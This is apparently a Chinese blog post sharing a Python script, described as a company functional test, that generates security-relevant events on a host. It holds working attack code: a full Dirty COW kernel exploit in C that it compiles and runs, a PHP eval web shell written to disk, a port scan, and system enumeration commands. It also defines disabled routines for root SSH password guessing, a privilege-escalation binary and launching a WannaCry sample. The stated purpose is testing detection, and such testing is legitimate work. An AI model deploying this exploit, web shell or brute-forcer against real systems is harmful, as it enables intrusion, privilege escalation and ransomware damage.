某一功能测试脚本
帮公司测试写的一个功能测试脚本。要求尽量少用第三方库,但连接 SSH 必须依赖第三方库(paramiko),所以还是用到了。
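# coding:utf-8
"""Functional test script that generates a fixed set of security-relevant events.

Usage (arguments are positional, the flags themselves are not parsed):

    python checklist.py -h 127.0.0.1 -p /tmp/

Active steps, in order: TCP connect probe of a fixed port list on the host,
drop of a PHP test file under the path, local enumeration commands, and a
Dirty COW kernel check. The SSH login attempts, the privilege-escalation
binary and the ransomware sample are defined but left disabled in __main__.

Files created in the current directory (mc_poc.c, mc_tmp, mc_poc) and
<path>webshell.php are not removed by the script.
"""
import socket
import sys
import os
import subprocess
from subprocess import Popen, PIPE

print("\033[0;31m ")
print('''
●●●█〓█████████▅▄▄▄▄▄▄▄▃▃▃▃▄
●● ▄██ 〓█★ ★█ 〓 ██▄ [ @Author:2amor ]
▄▅██████████████████████▅▄▃
███████████████████████████◤
◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙
''')
print("\033[0m")

# C source of the kernel check. It maps a file read-only/private and races
# madvise(MADV_DONTNEED) against writes through /proc/self/mem; the probe
# file only changes if the running kernel is affected.
poc_code = """
/*
 * main.c
 *
 *  Created on: Oct 21, 2016
 *      Author: 5t4rk
 */

#include<stdio.h>
#include<sys/mman.h>
#include<fcntl.h>
#include<pthread.h>
#include<string.h>

void *map;
int f;
struct stat st;
char* name;

void * madviseThread(void *arg) {
    char *str;
    str = (char *) arg;
    int i, c = 0;
    for (i = 0; i < 100000000; i++) {
        c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\\n", c);
}

void * procselfmemThread(void *arg) {
    char *str;
    str = (char *) arg;
    int f = open("/proc/self/mem", O_RDWR);
    int i, c = 0;
    for (i = 0; i < 100000000; i++) {
        lseek(f, map, SEEK_SET);
        c += write(f, str, strlen(str));
    }
    printf("procselfmem %d\\n", c);
}

int main(int argc, char *argv[]) {
    if (argc < 3)
        return 1;
    pthread_t pth1, pth2;
    f = open(argv[1], O_RDONLY);
    fstat(f, &st);
    name = argv[1];
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
    printf("mmap %x\\n", map);
    pthread_create(&pth1, NULL, madviseThread, argv[1]);
    pthread_create(&pth2, NULL, procselfmemThread, argv[2]);
    pthread_join(pth1, NULL);
    pthread_join(pth2, NULL);
    return 0;
}
"""

# Initial content of the probe file; the check compares against it afterwards.
test_content = "noo"


def write_poc(code, file):
    """Write the string `code` to the path `file`, replacing any existing file."""
    with open(file, 'w') as f:
        f.write(code)


def mc_gcc(file):
    """Compile `file` with gcc into ./mc_poc and return (stdout, stderr).

    The command is assembled by string concatenation and run through a
    shell, so `file` must stay a fixed, script-chosen name (the caller
    passes 'mc_poc.c').
    """
    pobj = Popen('gcc ' + file + " -lpthread -o mc_poc",
                 stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    return pobj.communicate()


def mc_vuln(file):
    """Return the current content of the probe file `file`.

    Reads the file directly instead of shelling out to `cat`, so no command
    string is built from the file name. Returns '' when the file cannot be
    read, which is what the earlier `cat` call produced on stdout.
    """
    try:
        with open(file) as f:
            return f.read()
    except (IOError, OSError):
        return ''


def mc_binx(file):
    """Run the compiled check `./<file>` against mc_tmp and return (stdout, stderr).

    The binary sits at the head of a shell pipeline whose remaining stages
    look up its PID with ps/grep/awk and send it SIGKILL, so it does not run
    its full 100000000-iteration loops (presumably to bound the run time).
    The command string is order-sensitive and is kept exactly as written.
    """
    pobj = Popen('./' + file + " mc_tmp yes|ps -ef|grep '[m]c_poc mc_tmp'|awk '{print $2}'|xargs kill -9",
                 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                 shell=True)
    return pobj.communicate()


def scan_port(host):
    """TCP-connect to a fixed list of service ports on `host` and print the open ones.

    Each probe is a full connect with a 2 second timeout, so it is visible
    to the target as ordinary connection attempts from this machine.
    """
    ports = [21, 22, 23, 53, 139, 445, 1433, 3306, 3389, 8123]
    target_ip = socket.gethostbyname(host)
    for port in ports:
        print("port scanning is %s " % port)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.settimeout(2)
            if sock.connect_ex((target_ip, port)) == 0:
                print("open_port:" + str(port))
        finally:
            # One socket per port: close it so descriptors are not leaked.
            sock.close()


def exec_system():
    """Run a fixed set of local enumeration commands.

    os.system() sends each command's output straight to the terminal; the
    value printed afterwards is only the command's exit status.
    """
    print(os.system('whoami'))
    print(os.system('uname -a'))
    print(os.system('cat /proc/version'))
    print(os.system('cat /etc/crontab'))
    print(os.system('netstat -ntlp'))
    print(os.system('id'))
    print(os.system('ps -ef'))


def echo_webshell(path):
    """Create <path>webshell.php containing a one-line PHP eval stub.

    `path` is joined by plain concatenation, so it must end with a path
    separator. An existing file of that name is replaced. The file is a
    test artifact for file-monitoring / web-shell detection and stays on
    disk after the run.
    """
    path = path + 'webshell.php'
    if os.path.exists(path):
        os.remove(path)
    with open(path, 'w') as f:
        f.writelines("<?php @eval($_POST['cmd']);?>")
    if os.path.exists(path):
        print('生成脚本木马文件成功!')


def ssh_connect(host):
    """Attempt root SSH logins on `host`:22 with three fixed weak passwords.

    Not called from __main__. On the target each rejected attempt should
    appear as a failed password authentication for root. AutoAddPolicy
    accepts whatever host key the server presents, i.e. the server's
    identity is not verified.
    """
    # Imported here because only this function needs the third-party
    # package; the rest of the script runs on the standard library alone.
    import paramiko

    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    password = ['toor', 'admin123', 'root123']
    logged_in = False
    for pwd in password:
        try:
            print(host, pwd)
            ssh.connect(hostname=host, port=22, username='root', password=pwd, timeout=5)
            ssh.close()
            logged_in = True
            print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host)
        except paramiko.AuthenticationException:
            pass
    # Report failure only when no password was accepted; previously this
    # line was printed after every run, including successful ones.
    if not logged_in:
        print("failed to connect ssh")


def get_root(path):
    """Mark <path>cowroot5 executable (via sudo) and run it.

    Not called from __main__. The binary is not part of this script; `path`
    must end with a path separator and is passed to the shell unquoted.
    """
    path = path + 'cowroot5'
    os.system("sudo chmod +x %s" % path)
    os.system("%s" % path)


def exec_wannacry(path):
    """Mark <path>wannacry executable and run it.

    Not called from __main__. The sample is not part of this script; `path`
    must end with a path separator and is passed to the shell unquoted.
    """
    path = path + 'wannacry'
    os.system("chmod +x %s" % path)
    os.system("%s" % path)


if __name__ == '__main__':
    # argv is read by position: [script, '-h', host, '-p', path]. Both
    # argv[2] and argv[4] are used below, so five entries are required.
    if len(sys.argv) < 5:
        print('argument error')
        print("pip install -r requirements.txt")
        print('example:python checklist.py -h 127.0.0.1 -p /tmp/')
        sys.exit(0)
    host = sys.argv[2]
    path = sys.argv[4]

    scan_port(host)
    echo_webshell(path)
    exec_system()

    # Kernel check: write the source and the probe file, build, run, then
    # see whether the probe file content changed from 'noo' to 'yes'.
    write_poc(poc_code, 'mc_poc.c')
    write_poc(test_content, 'mc_tmp')
    mc_gcc('mc_poc.c')
    mc_binx('mc_poc')
    probe = mc_vuln('mc_tmp')
    if probe == 'yes':
        print('The os is vulnerability!Please upgrade the kernel.')
    elif probe == 'noo':
        print('You are Lucky dog~ No vuln.')

    # Left disabled by the author:
    # ssh_connect(host)
    # get_root(path)
    # exec_wannacry(path)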
参考文献:
http://pirogue.org/2017/09/12/dirtycow/